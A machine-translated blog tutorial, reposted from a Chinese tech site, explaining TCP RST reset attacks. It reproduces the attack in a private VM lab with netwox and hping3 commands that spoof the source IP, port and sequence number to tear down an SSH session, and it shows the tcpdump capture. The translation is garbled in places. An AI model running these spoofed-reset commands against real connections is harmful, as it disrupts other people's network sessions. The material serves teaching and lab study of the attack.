This article is part of the network Protocol Must Know must know

How the reset attack works

What is a reset attack

There are several special bits in the TCP header: ACK,RST,SYN,FIN, and so on.

The TCP specification has a special meaning when the specified bit is set to 1.

For example, SYN=1 in three handshakes and FIN=1 in four waves. The RST flag bit is used in the reset attack.

Identify a	meaning
ACK	Confirm serial number is valid
RST	Reset, close abnormal connection
SYN	The synchronization number is used to initiate a connection
FIN	The sender completes the sending task

The RST reset attack is implemented by using THE RST flag bit of TCP

Popular for

Xiao Ming and Xiao Hong are in love, but they are far away from each other. They write their names on a piece of paper and let their classmates pass them on.

Later xiaogang jealous, secretly to xiaogang wrote a breakup letter, signed xiaoming’s name.

Xiao Hong thought really want to break up, put out the passion in the heart.

Then xiao Ming’s letter came again. Xiao Hong replied “Break up and get out”.

Xiao Ming was disheartened after receiving the letter

Finally xiao Ming and Xiao Gang live a happy life.

General speaking

After establishing A connection, client A and server B hold each other’s serial numbers. If the serial number, port number, and source IP address are consistent with the rules, the server considers the data valid and performs corresponding operations.

At this time, client C forges A’s RST operation and sends it to B after obtaining the important information of A and B.

B resets and closes the connection after receiving the command.

When A normally requests data from A,B considers A request to be an exception and sends an RST command to A, and A also disconnects from the connection.

Actual combat emersion

Here is the desktop 20.1.0.1

The two VMS are 20.1.0.128 and 20.1.0.132 respectively

Thereafter, they are denoted by (1), (128) and (132)

Two attacks are simulated here, the first is a Netwox attack and the second is a Hping3 attack.

Under Netwox, the (128) server,(1) is both the client and the attack aircraft, and (132) is the detection machine

At hping3 (128) the server, (1) is the client, and (132) is the attack aircraft

The main content is under Netwox, please watch it in order

Netwox and wireshark on (1), hping3 on (132)

`netwox`attack

(1) Wireshark listens for requests from port 22 on a specified NETWORK adapter. (132) connect to (128) over SSH and perform tcpdump to listen on port 22.
(1) Connect to server (128) using SSH, and the Wireshark can view the following records

The red line identifies the last (1)->(128) TCP instruction, where we get the data we need from the selected one

Here we know that the port number of (1) is 58744 and the sequence number is 782014969, and we also know the two server IP addresses.

From here we can launch an attack

Netwox 40 -l 20.1.0.1 -m 20.1.0.128 -o 58744 -p 22 -b -q 782014969Copy the code

-l Disguised source IP address -m Target IP address -o Disguised source port number -p Port number of the target IP address -b -q Original IP address sequence number

After we send the instructions, we’ll goWiresharkYou’ll find two disguised RST instructions. false(1)->(128). RST To this(128).Reset the connection.

After a certain amount of time (less than a minute), SSH on real (1) sends the request to (128), at which point (128) does not recognize him and replies with an RST message

At this point (1) also breaks.

SSH: Connection closed by foreign host Not Broken Pipe, isn’t that surprising?

So what’s on the monitoring server here

15:15:43.944077 IP 20.1.0.1.58744 > 20.1.0.128. Flags [.], ACK 3474807771, win 2048, length 0 15:15:47.751231 IP 20.1.0.1.58744 > 20.1.0.128.ssh: Flags [P.], seq 782014917:782014969, ack 3474807771, win 2048, Length 52 15:15:47.751716 IP 20.1.0.128.ssh > 20.1.0.1.58744: Flags [P.], seq 3474807771:3474807855, ack 782014969, win 270, Length 84 15:15:47.792409 IP 20.1.0.1.58744 > 20.1.0.128. SSH: Flags [.], ACK 3474807855, win 2048, length 0 15:16:10.784854 IP 20.1.0.1.58744 > 20.1.0.128. SSH: Flags [R], seq 782014969, win 0, length 0 15:16:11.623166 IP 20.1.0.1.58744 > 20.1.0.128.ssh: Flags [P.], seq 782014969:782015005, ack 3474807855, win 2048, Length 36 15:16:11.623311 IP 20.1.0.128.ssh > 20.1.0.1.58744: Flags [R], seq 3474807855, win 0, length 0Copy the code

So you can also test TCP reset attacks yourself based on tcpdump monitoring

`hping3`attack

(1) Wireshark listens for requests from port 22 on a specified NETWORK adapter. (132) as an attack aircraft, (128) as a server
(1) Connect to server (128) using SSH, and the Wireshark can view the following records

Then, in(132).Performed on the

Sudo hping3 -a 20.1.0.1 -s 57292 -r 20.1.0.128 -p 22 -m 2042569399 -c 1Copy the code

Sudo hping3 -a Masked source IP address -s Masked source port number -r Target IP address -p Target port number -m Source IP address sequence number -c 1

Go here to see Wireshark and there are already two RST records

The SSH of (1) is also broken

Connection closed by foreign host.
Copy the code

The last

Did two days, from write network protocol -TCP three handshake and network protocol -TCP four wave collection of TCP reset attack instances, half of the articles on the Internet are not tested, only a start and a so-called result. Netwox attack example is a foreign university online to find examples in the courseware to see clearly,hping3 is based on a wrong example, combined with man annotation, and has been successful on the Netwox attack to speculate.

The paper come zhongjue shallow, and must know this to practice

Finally finally, have know I use of (132) server is what system 😊?

conclusion

As far as the letter is not as good, the above content is purely one’s opinion, due to the limited personal ability, it is inevitable that there are omissions and mistakes, if you find bugs or have better suggestions, welcome criticism and correction, don’t hesitate to appreciate

If you like my article, you can [follow]+[like]+[comment], your three even is my forward motivation, looking forward to growing with you ~

Source: author: ZOUZDC links: https://juejin.cn/post/7028963866063306760 re the nuggets copyright owned by the author. Commercial reprint please contact the author for authorization, non-commercial reprint please indicate the source.Copy the code

mo4tech.com (Moment For Technology) is a global community with thousands techies from across the global hang out!Passionate technologists, be it gadget freaks, tech enthusiasts, coders, technopreneurs, or CIOs, you would find them all here.

(This is the real real operation)TCP reset attack principle and actual combat replay | homework

How the reset attack works

What is a reset attack

Popular for

General speaking

Actual combat emersion

`netwox`attack

`hping3`attack

The last

conclusion

(This is the real real operation)TCP reset attack principle and actual combat replay | homework

How the reset attack works

What is a reset attack

Popular for

General speaking

Actual combat emersion

netwoxattack

hping3attack

The last

conclusion

Related Posts

Talk about the similarities and differences between clustering, distribution, and microservices

Basic principles of I/O reading and writing

Activiti6.0 Combat – Flow chart highlighting Track custom rendered images

`netwox`attack

`hping3`attack